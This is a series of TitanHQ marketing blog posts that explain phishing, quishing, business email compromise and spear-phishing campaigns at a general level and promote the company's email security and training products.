Cybercriminals and nation state threat actors are targeting businesses to steal sensitive information, often also using file encryption with ransomware for extortion. Initial access to business networks is gained through a range of tactics, but the most common is the use of compromised credentials. Credentials can be guessed using brute force tactics, by exploiting password reuse in credential stuffing attacks, using malware such as keyloggers to steal passwords, or via phishing attacks.

According to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), compromised credentials are the most common method for initial access in attacks on critical infrastructure entities. CISA revealed that 41% of all attacks on critical infrastructure used compromised credentials and phishing and spear phishing were identified as the second most common attack vector. A separate study by Osterman Research and OPSWAT revealed that the majority of critical infrastructure entities have suffered an email security breach in the past 12 months, with 75% of critical threats arriving via email.

Should any of these email threats arrive in inboxes, they could be opened by employees resulting in the theft of their credentials or the installation of malware. Both could provide a threat actor with the access they need to steal sensitive data and encrypt files with ransomware. Email threats usually impersonate a trusted entity such as a vendor, well-known organization, colleague, or previous acquaintance, which helps to make the correspondence appear authentic, increasing the likelihood of an employee responding.

According to CISA, the success rate of these emails depends on the technical defenses a business has in place and whether security awareness training has been provided to the workforce. The primary defense against phishing and other email attacks is a spam filter, which can be a cloud-based spam filtering service or gateway spam filter. CISA recommends implementing email filtering mechanisms incorporating Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM), as both are important for protecting against spoofing and email modification.

Antiphishing defenses should rewrite URLs to show their true destination, and for maximum protection – especially against AI-generated phishing attempts – anti-spam software should incorporate machine learning and AI-based detection mechanisms and analyze email content to determine how emails deviate from the typical emails received by a business. Malware is often used in attacks, so spam filters should incorporate antivirus protection, including email sandboxing to detect malware based on its behavior rather than signature since many novel threats can bypass the signature-based defenses of standard anti-virus products.

A web filter is a useful tool for protecting against the web-based component of phishing attempts, as it can block access to known malicious websites and also prevent visits to malicious websites from general web browsing. Security awareness training should be provided frequently to the workforce to improve human-based defenses and reduce the risk of employees being tricked by social engineering and phishing attempts. Employees should also be provided with an easy way of reporting suspicious requests to their security teams. Backing up security awareness training with phishing simulations can help reinforce training and identify knowledge gaps.

To protect against compromised credentials, multifactor authentication should be implemented, with phishing-resistant MFA providing the highest level of protection. Password policies should be implemented that require the use of unique, strong passwords, all default passwords should be changed, and any inactive or unnecessary accounts should be disabled.

TitanHQ can help protect against these attacks through a suite of cybersecurity solutions. SpamTitan email Security, the WebTitan DNS-based web filter, the PhishTitan anti-phishing solution for Microsoft 365, and the SafeTitan security awareness training platform. All solutions have been developed to be easy for businesses to implement and use and provide cutting-edge protection against the full range of cyber threats. For more information give the TitanHQ team a call and take the first steps towards improving your defenses against increasingly sophisticated cyber threats.

Novel QR Code Phishing Campaign Steals M365 Credentials via Microsoft Sway

QR codes are used for a wide range of purposes, including marketing, communications, and even in restaurants to direct diners to menus, and with the popularity of QR codes soaring it should be no surprise that they are being used by cybercriminals in their phishing campaigns. QR codes are similar to the bar codes on products. They are black and white images that contain information, which for QR codes is commonly a URL for a web page or hosted file. A camera on a smartphone is used to scan the code, which will detect the URL, and the user can click that URL to visit the resource. It is far more convenient than entering a URL on a mobile phone keypad.

The use of QR codes has been growing considerably. According to a 2024 report from QR Tiger on QR Code trends, there has been 47% year-over-year growth in QR code usage. The convenience of QR codes and their growing popularity have not been lost on cybercriminals who are using QR codes to direct unsuspecting users to malicious websites that host malware or are used to phish for credentials. As an added advantage, many traditional security solutions are unable to assess the URLs in QR codes and fail to block access to malicious sites.

QR code phishing (aka quishing) may involve QR codes sent via email. Instead of embedding a hyperlink in an email, a QR code is used to evade email security solutions. A novel campaign has recently been detected by security researchers at Netskope Threat Labs that uses QR codes to steal Microsoft 365 credentials. In this campaign, a Microsoft 365 product called Microsoft Sway is abused to host the spoofed web pages.

Microsoft Sway is used for creating newsletters and presentations and was first released by Microsoft under the M365 product suite in 2015. Since Microsoft Sway is a legitimate Microsoft cloud-based tool, a link to a Sway presentation is unlikely to be identified as malicious by security solutions, as Sway is a trusted platform. The link to the Sway presentation may be distributed in emails, SMS messages, and instant messenger platforms, or can be added to websites in an iframe. A QR code could even be used to direct a user to the Sway presentation.

That presentation includes a QR code that encodes a URL for a website that masquerades as a legitimate Microsoft site. If scanned, the user is directed to a web page where they are asked to enter their Microsoft 365 credentials. What makes this campaign even harder for users to identify is the transparent phishing technique used.  Entering credentials will log the user into the legitimate site, and at the same time credentials are captured along with any MFA code, which are relayed to the attacker. The credentials and MFA code are then used to hijack the account.

TitanHQ offers several cybersecurity solutions that provide layered protection against advanced phishing attempts, including quishing. Since these scams target individuals, it is important to raise awareness of the threat by providing security awareness training to the workforce. The SafeTitan platform from TitanHQ includes a wealth of training content, including modules for raising awareness of quishing. The platform also includes a phishing simulator with quishing templates to test whether employees scan QR codes and visit the websites they encode.

Regardless of how a URL is communicated to a member of the workforce, it is possible to block access to a malicious URL with a DNS filter. TitanHQ’s DNS filter, WebTitan, blocks access to all known malicious websites and is constantly updated with the latest threat intelligence from a global network of users. As soon as a malicious URL is detected, the solution is updated and all WebTitan users are protected. QR code may direct users to websites where malware is downloaded. WebTitan can be configured to block file downloads from the internet by file type.

QR codes are commonly sent via email, so an advanced email security solution is required. SpamTitan is a cutting-edge spam filtering service that uses advanced detection techniques, including AI and natural language processing to identify and block these threats, even zero-minute phishing attempts. In contrast to many spam filters for incoming mail, SpamTitan can detect novel phishing and quishing attempts. Finally, businesses can add another layer of protection through PhishTitan, TitanHQ’s advanced anti-phishing solution for Microsoft 365 which blocks attempts to visit phishing sites and allows security teams to easily remediate phishing attempts across their entire email system.

Phishers are constantly developing new tactics and techniques for distributing malware and stealing credentials, but with TitanHQ solutions in place, you will be well protected against these rapidly evolving threats. Talk with TitanHQ’s cybersecurity experts today for more information on staying one step ahead of cybercriminals and keeping your company safe.

Is Your Business Protected Against Internal Phishing Attempts?

If a phishing attempt is successful and a threat actor gains access to an employee’s email account, it is common for the compromised email account to be used for internal phishing. Some malware variants also allow threat actors to hijack email accounts and send malware internally, adding a copy of the malware to a message thread to make it appear that a file was attached in response to a past email conversation.

There are several different scenarios where these types of attacks will occur such as business email compromise attacks to gain access to an email account that can be used for the scam – a CEO, executive, HR, or IT department account for example; to distribute malware extensively to compromise as many accounts as possible; to gain access to multiple email accounts, or to compromise multiple accounts to gain access to sensitive data.

In industries where data breach reporting is mandatory, such as in healthcare in the United States, email account breaches are regularly reported where unauthorized activity is detected in a single email account, and the subsequent investigation reveals multiple employee email accounts have been compromised through internal phishing.

Internal phishing attempts are much harder to identify than phishing attempts from external email accounts. Even when email security solutions incorporate outbound scanning, these phishing attempts are often not recognized as malicious as the emails are sent from a trusted account. The recipients of these emails are also much more likely to trust an internal email than an external email from an unknown sender and open the email, click a link, or open a shared file.

Attackers may also spoof an internal email account. It is easy to find out the format used by a company for their emails, and names can be found on professional networking sites. A good email security solution should be able to identify these spoofed emails, but if they arrive in an inbox, an employee may be fooled into thinking that the email is a genuine internal email.

It is important for businesses to take steps to combat internal phishing as it is a common weak point in email defenses. Unfortunately, there is no single technical control that can protect against these phishing attempts. What is required is a combination of measures to provide layered protection. With layered security, if one measure fails to protect against a threat, others are in places that can thwart the attempt.

The best place to start is with a technical measure to identify and block these phishing threats. Spam filter software naturally needs to have inbound as well as outbound scanning; however, standard checks such as reputation scans are not enough. An email security solution should have AI and machine learning capabilities for assessing how emails deviate from standard emails sent internally and for in-depth analysis of message content. Link scanning is also important, with URL rewriting to identify the true destination of embedded URLs, OLE detection, and email sandboxing to identify malicious attachments – not just malware but also malicious links in email attachments.

Security awareness training is vital as employees may not be aware of threats they are likely to encounter. Security awareness training should include internal phishing and employees should be made aware that they should not automatically trust internal emails as they may not be what they seem. Security awareness training should be accompanied by phishing simulations, including simulated phishing attempts from internal email accounts.  These will give employees practice in identifying phishing and security teams will learn how susceptible the workforce is and can then take steps to address the problem.

Multi-factor authentication is required. If a phishing attempt is not identified by either a security solution or the employee, and the employee responds and divulges their credentials, they can be used by the threat actor to access the employee’s email account. Multi-factor authentication protects against this by requiring another factor – in addition to a password – to be provided. The most robust form of MFA is phishing-resistant MFA, although any form of MFA is better than none.

TitanHQ can help protect against phishing attacks of all types through the SpamTitan cloud-based spam filtering service, the PhishTitan anti-phishing solution for M365, and the SafeTitan Security awareness training and phishing simulation platform.

The engine that powers SpamTitan and PhishTitan has an exceptional phishing catch rate, including internal phishing attempts. The engine incorporates AI- and machine learning algorithms that can detect novel phishing attempts and emails that deviate from the normal emails sent internally, as well as OLE detection, URL rewriting, and email sandboxing for catching novel malware and phishing threats.

The SafeTitan Security awareness training platform includes an extensive library of training content to teach security best practices, eradicate risky behaviors, and train employees on how to recognize an extensive range of threats. The phishing simulator makes it easy to conduct internal phishing tests on employees to test knowledge and give employees practice at identifying email threats. Usage data shows the platform can reduce employee susceptibility to phishing attempts by up to 80%.

For more information about improving your phishing defenses, speak with TitanHQ today.

AI Tools Increasingly Used for BEC/VEC Attacks

Business email compromise (BEC) and vendor email compromise (VEC) attacks can result in huge financial losses that can prove catastrophic for businesses, and these attacks are being conducted with increasing regularity.

BEC and VEC attacks have their roots in phishing and often involve phishing as the first stage of the attack. These attacks involve impersonation of a trusted person through spoofed or compromised email accounts. The attacker then tricks the targeted individual into disclosing sensitive information or making a fraudulent wire transfer. In the case of the latter, the losses can be considerable. A company employee at Orion, a Luxembourg carbon black supplier, resulted in fraudulent transfers of $60 million. The employee was tricked into believing he was conversing with a trusted vendor and made multiple fraudulent transfers to the attacker’s account.

BEC and VEC attacks are among the most difficult email threats to detect, as they often use legitimate, trusted email accounts so the recipient of the email is unaware that they are conversing with a scammer. Since the attacker often has access to emails, they will be aware of confidential information that no other individual other than the genuine account holder should know. The attacker can also check past emails between the account holder and the victim and can mimic the writing style of the account holder. These attacks can be almost impossible for humans to distinguish from genuine communications. Scammers often reply to existing email threads, which makes these scams even more believable.

BEC/VEC scammers are increasingly turning to AI tools to improve their attacks and AI tools make these scams even harder for humans and email security solutions to identify.  AI tools can be fed past emails between two individuals and told to create a new email by mimicking the writing style, resulting in perfect emails that could fool even the most security-aware individual.

Some of the most convincing VEC attacks involve the use of compromised email accounts. The attacker gains access to the account through phishing or stolen credentials and searches through the account for information of interest that can be used in the scam. By searching through sent and stored emails, they can identify the vendor’s clients and identify targets. They are then sent payment requests for fake invoices, or requests are made to change the bank account information for genuine upcoming payments.

Due to the difficulty of identifying these threats, a variety of measures should be implemented to improve defenses, including administrative and technical controls, as well as employee training. In order to beat AI tools, network defenders need to adopt AI themselves, and should implement a spam filter with AI and machine learning capabilities, such as the SpamTitan cloud-based spam filtering service.

SpamTitan analyzes the genuine emails received by the company to create a baseline against which other emails can be measured. Through machine learning, Bayesian analysis, and other content checks, SpamTitan is able to identify the signs of BEC/VEC and alert end users when emails deviate from the norm. An anti-phishing solution is also strongly recommended to protect accounts against initial compromise and to raise awareness of potential threats. PhishTitan from TitanHQ incorporates cutting-edge threat detection with email banners warning about external emails and other threats and allows IT teams to rapidly remediate any attacks in progress.

Security awareness training is essential for raising awareness of the threat of BEC and VEC attacks. Since these scams target executives, IT, and HR staff, training for those users is vital. They should be made aware of the threat, taught how to identify these scams, and the actions to take when a potentially malicious message is received. With the SafeTitan security awareness training program it is easy to create training courses and tailor the content to cover threats each user group is likely to encounter to ensure the training is laser-focused on the most pertinent threats.

While spam email filtering and security awareness training are the most important measures to implement, it is also important to strengthen defenses against phishing through the adoption of multi-factor authentication on all email accounts, to prevent initial compromise. Administrative controls should also be considered, such as requiring employees to verify any high-risk actions, such as changes to bank accounts or payment methods, and maintaining a contact list of verified contact information to allow phone verification of any high-risk change. This two-step verification method can protect against all BEC/VEC attacks and prevent fraudulent payments.

Increasingly Advanced Phishing Campaigns Being Launched by Russia

Russian threat actors have been conducting increasingly advanced phishing campaigns against media organizations, international NGOs, and other targets perceived as being a threat to Russia. According to a recent report from Access Now and Citizen Lab, several international NGOs have reported being targeted with spear phishing emails in a campaign that has been ongoing since the start of 2023.

The campaign has been attributed to a threat actor known as COLDRIVER (aka Star Blizzard, Calisto) which multiple governments have attributed to the Russian Federal Security Service (FSB), and another campaign has been conducted by a second threat group, a relatively;y new threat group known as COLDWASTREL, whose interests align with those of COLDRIVER.

The campaigns aim to steal credentials rather than infect devices with malware. Spear phishing emails are used to make initial contact and trick the targets into disclosing their credentials. Emails are sent to individuals that have been highly personalized to maximize the probability of the recipient responding. A common theme was to make initial contact by masquerading as a person known to the target, including colleagues, funders, and U.S. government employees.

One of the common lures used in the emails was to request that the recipient review a document relevant to their work, which for media companies was often a draft article. In some of the emails, the document that the target was requested to view was not attached to the email. The failure to attach the file is likely a tactic used by the threat actor to see if the recipient responds and to only provide the file if they do. That could help to ensure that only the intended recipient is presented with the malicious file, reducing the risk of detection.

The file is often a PDF file, which if opened, only displays blurred text. The target is told that the text has been encrypted using an online service e.g. ProtonDrive. In order to view the document, the recipient is required to click a link. If the link is clicked, JavaScript code is fetched from the attacker’s server which fingerprints the system. If deemed to be of interest, they are directed to a URL that has a CAPTCHA check that must be passed to prevent bots from landing on the destination URL.

The landing page presents the user with a login prompt relevant to their email service, such as Gmail or ProtonMail, which may be pre-populated with the user’s email address so they are only required to enter their password and multifactor authentication code. If they are entered, the threat actor will obtain a session cookie that will allow them to access the account for some time before they are required to reauthenticate, allowing them to immediately access sensitive information in the target’s email account and associated online storage, such as Google Drive. The domains used for these campaigns did not remain operational for more than 30 days and they were registered with Hostinger, which rotates the IP addresses for the domains every 24 hours in an effort to prevent the sites being blocked by security solutions.

The targets of the campaign who spoke with the researchers chose to remain anonymous. They included Russian opposition figures in exile, NGO staff members in the US and Europe, funders, and media organizations. The researchers suggest that the campaign may have been conducted more broadly on other targets that are perceived threats to Russia. The researchers said a common theme among the targets was that they had extensive networks among sensitive communities and links to Russia, Ukraine, and Belarus.

Spear phishing campaigns can be highly effective as they are hyper-focused on small numbers of individuals and often are highly researched preceding initial contact to ensure that the right person is impersonated and a lure is used that the target is likely to respond to. Various measures are also used to reduce the chance of detection, including avoiding sending malicious content in the initial email, the use of CAPTCHA checks, and rotating IP addresses. Standard email security solutions may fail to detect these threats which means it is often down to the individuals to identify and avoid these threats. The consequences of failing to do so can be severe, especially for the targeted individuals in this campaign who could be subjected to physical harm or arrest and imprisonment.

Spear phishing is also used by cybercriminals in their campaigns, and while these attacks are typically financially motivated, they can cause significant harm to businesses. Similar tactics are used and the campaigns can be highly effective. To block spear phishing and other sophisticated phishing attacks, businesses need to have advanced email security measures that include email sandboxing and machine learning algorithms to identify potentially malicious emails, since standard checks of the sender’s reputation, embedded URLs, and malware scans are unlikely to identify anything suspicious. This is an area where TitanHQ can help. Give the team a call to find out more about protecting against advanced phishing and malware threats.

$60 Million Lost in Single Business Email Compromise Scam

Business Email Compromise (BEC) has long been one of the costliest types of cybercrime. According to the latest data from the Federal Bureau of Investigation (FBI) Internet Crime Compliant Center (IC3), almost 21,500 complaints were received about BEC attacks in 2023 resulting in adjusted losses of more than $2.9 billion. Between October 2013 and December 202, more than $50 billion was lost to BEC scams domestically and internationally.

What is Business Email Compromise?

BEC, also known as email account compromise (EAC), is a sophisticated scam that involves sending emails to individuals that appear to have come from a trusted source and making a legitimate-sounding request, which is typically a change to bank account details for an upcoming payment or payment of a fake invoice.

One such scam targets homebuyers, with the attacker impersonating the title company and sending details for a wire transfer for a down payment for a house purchase. Businesses are commonly targeted and asked to wire money for an upcoming payment to a different bank account. While the scammer is usually based overseas, the bank account may be at a bank in the victim’s home country. When the funds are transferred by the victim they are immediately transferred overseas or withdrawn, making it difficult for the funds to be recovered.

BEC attacks often start with phishing emails. The scammers use phishing to gain access to an employee’s email account, then the account is used to send phishing emails internally. The goal is to compromise the account of an executive such as the CEO or CFO. That account can then be used for the BEC part of the scam. Alternatively, vendors are targeted, such as construction companies, and their accounts are used for BEC attacks on their customers.

Once a suitable email account has been compromised, the scammers search through previous emails in the account to find potential targets – the company’s customers in the case of a vendor account or individuals responsible for making wire transfers in the case of a CEO’s account. The attackers study previous communications between individuals to learn the writing style of the account holder, and then craft their messages impersonating the genuine account owner. AI tools may also be used for this part of the scam or even researching targets. Alternatively, email accounts and websites may be spoofed, using slight variations of legitimate email addresses and domains. The information needed to conduct the scam may be gleaned from public sources or stolen via malware infections.

From here, a single request may be sent or a conversation may ensue over several emails to build trust before the request is made. Considerable time and effort is put into these scams because the effort is worth it for the scammers. The losses to these scams can be huge. Fraudulent wire transfers are often for tens of thousands of dollars or more, and with two recent scams, the losses have been immense.

Tens of Millions Fraudulently Obtained in BEC Scams

INTERPOL recently reported that it had successfully recovered more than $40 million stolen in a single BEC attack. The scammers targeted a commodities firm in Singapore, impersonating one of the company’s suppliers. In July, an email was received that had apparently been sent by the supplier requesting a pending payment be sent to a new bank account, in this case, the account was based in Timor Leste. In this scam, the email was sent from an account that differed slightly from the supplier’s legitimate email address. That difference was not identified and the bank account details were changed. A payment of $42.3 million was made to the account, and the transfer was only determined to be fraudulent when the supplier queried why the payment had not been received. INTERPOL was able to assist with the recovery of $39 million, and seven arrests were made which also involved the recovery of a further $2 million.

There has since been an even bigger scam and the victim was not so fortunate. The chemical manufacturing company Orion reported falling victim to a BEC attack that resulted in a $60 million loss. The Luxembourg firm told the U.S. Securities and Exchange Commission (SEC) that a non-executive employee was tricked into transferring the funds to multiple third-party accounts. So far, that loss has not been recovered.

How to Reduce Risk And Defeat BEC Attacks

Defending against BEC attacks can be a challenge, as legitimate email accounts are often used and the scammers are expert impersonators. The use of AI tools makes these scams even more difficult to identify. Defending against BEC attacks requires a defense-in-depth approach to prevent malicious emails from being delivered and prepare the workforce by improving awareness of the threats.

Security awareness training is vital. All members of the workforce should receive training and be made aware of BEC scams (and other cybersecurity threats). Training should cover the basics of these scams, such as why they are conducted and the attackers’ aims, as well as the red flags to look for. Phishing simulations can be highly beneficial, as BEC scams can be simulated to put training to the test and give individual practice at identifying these scams. TitanHQ’s SafeTitan platform includes BEC training material and a phishing simulator and makes it easy for businesses to improve their human defenses against BEC attacks.

Policies and procedures should be developed and implemented to reduce risk. For instance, it should be company policy for any requested change to banking credentials to be reviewed by a supervisor, and for any requested bank account changes by vendors to require verification by phone, using previously verified contact information.

It is vital to implement technical security measures to prevent email accounts from being compromised, malware from being installed, and to identify and block BEC emails. Traditional anti-spam software often fails to detect these sophisticated threats. A standard anti-spam appliance will perform a range of checks on the sender’s reputation and may be able to detect and block spoofed emails, but generally not emails sent from legitimate compromised accounts. Traditional anti-spam and antivirus solutions can detect known malware, but not novel malware threats.

What is needed is a next-generation hosted anti-spam service with machine learning and AI capabilities that can learn about the standard emails sent and received by a company or individual and determine when emails deviate from the norm and flag them as suspicious. AI-based protection is needed to defeat cybercriminals ‘ use of AI tools. The spam filtering service should also include email sandboxing in addition to standard anti-virus protection to identify and block novel malware threats, to prevent the malware infections that are used to gather information to support BEC attacks. SpamTitan from TitanHQ has all these features and more, with recent independent tests confirming the solution provides exceptional protection against phishing, spam, and sophisticated threats such as BEC attacks.

The most important thing to do is to take proactive steps to improve your defenses. Doing nothing could see your business featured in the next set of FBI statistics. Give the TitanHQ team a call today to discuss the best defenses for your business and find out more about how TitanHQ can help block BEC attacks and other cyber threats.

Massive Phishing Campaign Defeats SPF and DKIM by Leveraging Proofpoint Misconfiguration

A massive phishing campaign that involved around 3 million emails a day was made possible due to a misconfiguration in Proofpoint’s email servers. The vulnerability was exploited to get the emails DomainKeys Identified Mail (DKIM) signed and approved by SPF, thereby ensuring the emails were delivered to inboxes.

Researchers at Guardio identified the campaign, which ran from January 2024 to June 2024 and at its peak involved sending around 14 million emails a day. The purpose of the campaign was to steal credit card numbers and set up regular credit card payments. The emails impersonated well-known brands such as Nike, Disney, Coca-Cola, and IBM. As is common in phishing attempts, the headers of the emails were spoofed to make it appear that the email had been sent by a genuine company. The majority of spam filters would be able to detect this spoofing and block the emails because they use Sender Policy Framework (SPF) and DKIM, specifically to detect and prevent spoofing.

Emails must be sent from approved servers to pass SPF checks and they must be authenticated using the DKIM encryption key for the domain. With DKIM, public-key cryptography is used to sign an email with a private key when it leaves the sender’s server, and the recipient server uses the public key to verify the source of the message. If the from filed matches the DKIM check is passed and the email is determined to be authentic and will be delivered. If not, the email will identified as spam and will be blocked. In this campaign the emails were all properly signed and authenticated, ensuring that they would be delivered.

For an email that impersonated Nike, a spoofed email address would be used with the nike.com domain, which thanks to passing the SPF and DKIM checks, would be verified by the recipient as having been authenticated. The recipient may be fooled that the email has come from the genuine company domain, and since the emails themselves contained that company’s branding and provided a plausible reason for taking action, the user may click the link in the email.

As with most phishing emails, there is urgency. Action must be taken quickly to avoid negative consequences, such as an impending charge, notification about the closure of an account, or another pressing matter.  If the link is clicked, the user will be directed to a phishing site that also spoofs the brand and they are asked to provide their credit card details. Alternatively, they are offered a too-good-to-be-true offer, and by paying they also enroll in an ongoing subscription involving sizeable monthly charges.

The way that the attackers got around the checks was to send the emails from an SMTP server on a virtual server under their control and to route them through a genuine Office 365 account on an Online Exchange server, then through a domain-specific Proofpoint server which sent the email on to the intended recipient. Since the Proofpoint customers being spoofed had authorized the Proofpoint service to send emails on their behalf as an allowed email sender, the attackers only had to find a way to send spoofed emails through the Proofpoint relay. Due to a misconfiguration that allowed Microsoft Office 365 accounts to easily interact with its relay servers, they were able to do just that, pass SPF and DKIM checks, and make their fake emails appear to be clean.

They obtained the MX record for the company being spoofed by querying the domain’s public DNS, then routed the email through the correct Proofpoint host that is used to process email for that domain. Since the Proofpoint server was tricked into believing that the emails had come from the genuine domains of its customers – such as Nike and Disney – the emails were then forwarded to the intended recipients rather than being quarantined.

Spammers are constantly developing new methods of defeating the best email security solutions and while email security products can usually block spam and malicious emails, some will be delivered to recipients. This is why it is important to have layered defenses in place to protect against all phases of the attack. For instance, in this attack, spam filters were bypassed, but other measures could detect and block this attack. For instance, a web filter can be used to prevent a user from visiting a phishing website linked in an email, and security awareness training should be conducted to teach employees how to identify the signs of phishing, to check the domain of any website linked in an email, and to also check the domain when they arrive on any website.

Microsoft Forms Used in Phishing Campaign Targeting M365 Credentials

Microsoft credentials are being targeted in phishing campaigns that abuse Microsoft Forms. Microsoft Forms is a feature of Microsoft 365 that is commonly used for creating quizzes and surveys. Microsoft Forms has been used in the past for phishing campaigns, and Microsoft has implemented phishing protection measures to prevent abuse, but these campaigns show that those measures are not always effective.

To increase the probability of the phishing emails being delivered and the recipients responding, threat actors use compromised email accounts for the campaigns. If a business email account can be compromised in a phishing attack, it can be used to send phishing emails internally. Vendor email accounts are often targeted and used to conduct attacks on their customers. The emails are likely to be delivered as they come from a trusted account, which may even be whitelisted on email security solutions to ensure that their messages are delivered.

If the recipient clicks the link in the email they are directed to a Microsoft Form, which has an embedded link that the user is instructed to click. If the link is clicked, the user is directed to a phishing page where they are asked to enter their Microsoft 365 credentials. If the credentials are entered, they are captured by the attacker and are used to access their account.

The initial contact includes messages with a variety of lures, including fake delivery failure notifications, requests to change passwords, and notifications about shared documents. When the user lands on the form, they are told to click a link and fill in a questionnaire, that link then sends the user to a phishing page that appears to be a genuine login page for Microsoft 365 or another company, depending on which credentials are being targeted.

The attackers make their campaign more realistic by using company logos in the phishing emails and familiar favicons in the browser tab on the fake web pages. Since Microsoft Forms is used in this campaign, the URL provided in the phishing emails has the format https://forms.office[dot]com, as the forms are on a genuine Microsoft Forms domain. Not only does that help to trick the user into thinking the request is genuine, but it also makes it much harder for email security solutions to determine that the email is not legitimate as the forms.office[dot]com is generally trusted as it has a high reputation score.

When these phishing campaigns are detected, Microsoft takes prompt action to block these scams. Each form has a ‘report abuse’ button, so if the scams are identified by users, Microsoft will be notified and can take action to shut it down. The problem is that these emails are being sent in huge numbers and there is a considerable window of opportunity for the attacks. Further, if the attacker’s campaign is detected, they can just set up different web pages and forms and continue.

These phishing campaigns involve two phases, the first phase involves compromising email accounts to send the initial phishing emails. An advanced email security solution with sandboxing, URL rewriting, and AI-based detection capabilities will help to block this first phase of the attack. Advanced anti-phishing solutions for Office 365 can reduce the number of phishing emails that land in inboxes, even when sent from trusted email accounts. Banner warnings in emails will help to alert users to potential phishing emails; however, users need to be vigilant as it may be up to them to spot and report the phishing attempt. That means security awareness training should be provided to raise awareness of these types of phishing attempts.

Security awareness training should also incorporate phishing simulations, and it is recommended to create simulations of phishing attempts using Microsoft Forms. If users fall for the fake Microsoft Forms phishing attempts, they can be provided with further training and told how they could have identified the scam. If another Microsoft Forms phishing attempt is received, they are more likely to be able to identify it for what it is.

TitanHQ can help businesses improve their defenses against phishing through the TitanHQ cybersecurity suite, which includes SpamTitan cloud-based anti-spam service, the PhishTitan anti-phishing solution, and the SafeTitan security awareness and phishing simulation platform. SpamTitan and PhishTitan have exceptionally high detection rates with a low false positive rate, and SafeTitan is the only behavior-driven security awareness training platform that delivers training in real-time in response to employee mistakes. Give the TitanHQ team a call today for more information about these products, you can book a product demonstration to find out more, and all solutions are available on a free trial.

How Real-Time Security Awareness Training Improves Cybersecurity

Cybersecurity awareness training is now vital for businesses to raise employees’ awareness of cyber threats. Here we will explain why you need real-time security awareness training and phishing simulations and the difference they can make to your security posture.

The biggest cybersecurity threat faced by businesses is phishing. Phishing attacks target employees as cybercriminals and nation-state actors know all too well that employees are a weak link in security defenses. If they can get a phishing email in front of an employee and give them a plausible reason for taking the action they suggest, they can steal credentials that will give them the access they need or get the employee to download and open a malicious file, that will download malware and provide persistent access to the network.

If doesn’t always need to be a sophisticated phishing attempt if the email lands in the inbox of a busy employee or one who lacks security awareness. Many unsophisticated phishing attempts succeed due to human error. The problem is that phishing attempts are often sophisticated, and are now being crafted using LLMs that not only ensure that the emails are devoid of spelling mistakes and grammatical errors, but LLMs can also help to devise new phishing lures.

All it takes is for one phishing attempt to be successful to give an attacker the access they need for an extensive compromise. Cybercriminals often gain access to an employee’s email account and then use that account to conduct further phishing attempts internally, until they compromise large numbers of email accounts and manage to steal credentials with high privileges. Since email accounts often contain a wealth of sensitive and valuable data, the attack does not even need to progress further for it to be costly to remediate.

Businesses need to ensure that they have robust email security defenses, including an email security solution with sandboxing, AI, and machine learning detection to identify and block malware threats and zero-day phishing attacks, malicious URL detection capabilities, and a solution that is constantly updated with the latest threat intelligence. While the most advanced cloud-based email security solutions will block the vast majority of malicious emails, they will not block all threats. For example, in recent independent tests, SpamTitan email security was determined to have a spam catch rate of 99.984%, a phishing catch rate of 99.99%, and a malware catch rate of 100% with zero false positives, finishing second in the test.

For the small percentage of malicious emails that do reach inboxes, employees need to be prepared, be on their guard, and have the skills to identify and report suspicious emails, which is where security awareness training and phishing simulations are needed.

The purpose of security awareness training is to raise the level of awareness of cyber threats within the workforce, teach cybersecurity best practices, and eliminate risky behaviors. Training will only be effective if it is provided regularly, building up knowledge over time. Training should ideally be provided in short regular training sessions, with training programs running continuously throughout the year. Each week, every employee can complete a short training module which will help to build awareness and keep security fresh in the mind, with the ultimate goal of creating a security culture where every employee is constantly on their guard and aware that the next email they receive could well be a phishing attempt or contain malware.

Training is most effective when combined with phishing simulations. You can teach employees how to recognize a phishing email, but simulations give them practice at detecting threats and applying their training. Further, the emails will be received when the employees are completing work duties, just the same as a genuine phishing threat. A phishing simulator can be used to automate these campaigns, and administrators can track who responds to determine the types of threats that are tricking employees and the individuals who are failing to identify threats. Training programs can then be tweaked accordingly to address the weaknesses.

The most effective phishing simulation programs automatically deliver training content in real-time in response to security mistakes. When a phishing simulation is failed, the employee is immediately notified and given a short training module relevant to the mistake they made. When training is delivered in real time it serves two important purposes. It ensures that the employee is immediately notified about where they went wrong and how they could have identified the threat, and the training is delivered at the point when it is likely to have the greatest impact.

SafeTitan from TitanHQ makes providing training and conducting phishing simulations simple. The training modules are enjoyable, can be easily fitted into busy workflows, and the training material can be tailored to the organization and individual employees and roles. The training and simulations can be automated and require little management, and since the content is constantly updated with new material and phishing templates based on the latest tactics used by cybercriminals, employees can be kept constantly up to date.

For more information about SafeTitan security awareness training and phishing simulations, give the TitanHQ team a call.

Don’t Put Up with Substandard Phishing Protection for M365!

Businesses that rely on Microsoft Defender for detecting malware and phishing emails may not be as well protected as they think. While Defender performs a reasonable job at blocking malware, spam, and phishing emails, it lacks the high detection levels of many third-party anti-phishing solutions.

Take malware for example. A study conducted in 2022 by AV-Comparatives found Defender only had a 60.3% offline detection rate. Fast forward to Q2, 2024, and TitanHQ’s email security suite was put to the test alongside 12 other email security solutions by Virus Bulletin. In the independent tests, TitanHQ had a malware catch rate of 100%.

In the same round of testing, TitanHQ’s spam filter for Office 365 and the email security suite had a spam catch rate of over 99.98%, a phishing email catch rate of 99.99%, and was given an overall final score of 99.984, the second highest in the tests. It is possible to configure an email solution to provide maximum protection; however, that will be at the expense of an elevated number of false positives – genuine emails that are inadvertently marked as potentially suspicious and are quarantined until they are released by an administrator. In the tests, TitanHQ had a 0.00% false positive rate, with no genuine emails misclassified.

Another issue with Microsoft Defender is the exception list, which contains locations such as files, folders, and processes that are never scanned. These are used to ensure that legitimate apps are not scanned, to prevent them from being misclassified as malware. The problem is that the exception list lacks security protections, which means it can be accessed internally by all users. Should a device be compromised, a threat actor could access the exceptions list, identify folders and files that are not scanned, and use those locations to hide malware.

Given the increasingly dangerous threat environment and the high costs of a cyberattack and data breach, businesses need to ensure they are well-defended, which is why many businesses are choosing to protect their Microsoft 365 environments with TitanHQ’s PhishTitan anti-phishing solution.

PhishTitan is a cloud-based, AI-driven solution for Microsoft 365 that integrates seamlessly into M365 to increase protection from sophisticated phishing attacks. Rather than replacing Microsoft’s EOP and Defender protections, PhishTitan augments them and adds next-generation phishing protection, not only ensuring that more threats are blocked but also giving users easy-to-use remediation capabilities.

